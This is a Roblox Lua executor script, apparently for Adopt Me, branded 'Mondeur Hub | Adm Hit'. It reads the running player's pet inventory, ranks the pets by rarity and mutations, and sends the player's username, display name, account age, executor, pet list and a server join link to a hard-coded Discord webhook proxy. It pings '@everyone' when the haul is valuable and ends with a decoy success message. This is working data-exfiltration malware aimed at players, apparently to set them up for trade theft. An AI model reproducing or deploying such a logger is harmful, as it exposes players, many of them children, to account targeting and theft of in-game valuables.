--// MONDEUR HUB | ADM HIT 🦊 (QUALITY + MUTATIONS PERFECT)

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage").ClientModules.Core.ClientData)

local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"
local request = (syn and syn.request) or (http and http.request) or http_request or request

if not request then return end

-- BASE WEIGHTS
local rarityWeight = {legendary=10000, ultra_rare=5000, rare=1000, uncommon=100, common=1}
local mutationBonus = {neon=500, mega=1000, ride=200, fly=200}
local colors = {legendary=0xFFD700, ultra_rare=0xA020F0, rare=0x1E90FF, uncommon=0x32CD32, common=0xB0B0B0}

-- =========================
-- PERFECT SCORE CALC
-- =========================
local function calculateScore(pet)
    local score = rarityWeight[pet.rarity] or 1
    score = score + (pet.count or 1)
    
    -- MUTATION BONUSES
    if pet.neon then score = score + mutationBonus.neon end
    if pet.mega then score = score + mutationBonus.mega end
    if pet.ride then score = score + mutationBonus.ride end
    if pet.fly then score = score + mutationBonus.fly end
    
    return score
end

-- =========================
-- NAME CLEANER
-- =========================
local function getCleanName(id)
    local name = tostring(id or ""):lower():gsub("_", " ")
    
    local bad = {"egg", "jerboa", "starter", "practice", "minigame"}
    for _, b in ipairs(bad) do if name:find(b) then return nil end end
    
    name = name:gsub("^japan%s*", ""):gsub("^basic%s*", ""):gsub("^common%s*", "")
    name = name:gsub("%d", ""):gsub("%s+", " "):gsub("^%s*(.-)%s*$", "%1")
    
    -- PERFECT FIXES
    if name:find("kelpie") then name = "Australian Kelpie"
    elseif name:find("shiba") then name = "Shiba Inu"
    elseif name:find("metal ox") then name = "Metal Ox"
    elseif name:find("ghost wolf") then name = "Ghost Wolf"
    elseif name:find("spider crab") then name = "Spider Crab"
    elseif name:find("rhino beetle") then name = "Rhino Beetle"
    elseif name:find("leopard cat") then name = "Leopard Cat"
    end
    
    return name:sub(1,1):upper() .. name:sub(2)
end

-- =========================
-- EMOJIS
-- =========================
local function getEmoji(name, pet)
    local n = name:lower()
    if n:find("ox") then return "🐂"
    elseif n:find("fox") then return "🦊"
    elseif n:find("dog|kelpie|shiba") then return "🐕"
    elseif n:find("cat") then return "🐱"
    elseif n:find("crab") then return "🦀"
    elseif n:find("beetle") then return "🐞"
    elseif n:find("bee") then return "🐝"
    end
    
    local e = ""
    if pet.mega then e = e .. "🌈" end
    if pet.neon then e = e .. "🟣" end
    if pet.ride then e = e .. "🏇" end
    if pet.fly then e = e .. "🪽" end
    return e ~= "" and e or "🐾"
end

-- =========================
-- PROCESS
-- =========================
local function processPets()
    local inventory = ClientData.get("inventory")
    local raw = inventory.pets or {}
    local pets = {}
    local totalValue = 0
    
    for _, pet in pairs(raw) do
        if pet.id then
            local name = getCleanName(pet.id)
            if name then
                if not pets[name] then
                    pets[name] = {
                        name = name,
                        count = 0,
                        rarity = string.lower(pet.rarity or "common"),
                        neon = pet.neon or pet.properties.neon,
                        mega = pet.mega or pet.properties.mega,
                        ride = pet.rideable or pet.properties.rideable,
                        fly = pet.flyable or pet.properties.flyable
                    }
                end
                pets[name].count += 1
                totalValue += 10
            end
        end
    end
    
    local list = {}
    for _, data in pairs(pets) do
        table.insert(list, data)
    end
    
    -- SORT BY QUALITY SCORE
    table.sort(list, function(a, b)
        return calculateScore(a) > calculateScore(b)
    end)
    
    return list, totalValue
end

-- =========================
-- WEBHOOK
-- =========================
local petList, totalValue = processPets()

local bestPet = petList[1] or {}
local bestName = bestPet.name and bestPet.count and (bestPet.name .. " x" .. bestPet.count) or "None"
local bestRarity = bestPet.rarity or "common"

local tier = totalValue >= 1500 and "🔴 HIGH" or totalValue >= 300 and "🟡 MID" or "🟢 LOW"

pcall(function()
    request({
        Url = WEBHOOK,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = HttpService:JSONEncode({
            content = tier == "🔴 HIGH" and "@everyone" or "",
            embeds = {{
                title = "🦊 Mondeur Hub | Adm Hit",
                description = "```" ..
                    "👤 "..game.Players.LocalPlayer.DisplayName.."\n🆔 "..game.Players.LocalPlayer.Name..
                    "\n📅 "..game.Players.LocalPlayer.AccountAge.." days\n📱 "..(identifyexecutor and identifyexecutor() or "Unknown")..
                    "\n👥 "..#game.Players:GetPlayers().."/"..game.Players.MaxPlayers..
                    "\n💰 "..totalValue.."\n📊 "..tier.."```",
                fields = {
                    {name="🏆 BEST (Quality+Mutations)", value="```"..bestName.."```"},
                    {name="🐶 PETS", value="```"..(function()
                        local lines = {}
                        for i=1,math.min(12,#petList) do
                            lines[i] = getEmoji(petList[i].name, petList[i]).." "..petList[i].name.." x"..petList[i].count
                        end
                        return table.concat(lines,"\n")
                    end)().."```"},
                    {name="🌐 JOIN", value="[Click](https://www.roblox.com/games/start?placeId="..game.PlaceId.."&instanceId="..game.JobId..")"}
                },
                color = colors[bestRarity] or 0x2F3136,
                footer = {text="Mondeuronbotton"}
            }}
        })
    })
end)

print("✅ METAL OX #1 - Neon/Mega bonuses added!")
